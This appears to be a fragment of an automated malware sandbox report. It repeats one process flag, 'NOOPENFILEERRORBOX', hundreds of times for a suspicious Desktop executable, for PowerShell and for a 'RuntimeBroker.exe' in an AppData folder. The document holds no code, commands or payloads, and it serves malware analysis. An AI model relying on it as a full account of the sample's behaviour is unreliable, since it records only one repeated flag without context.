Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
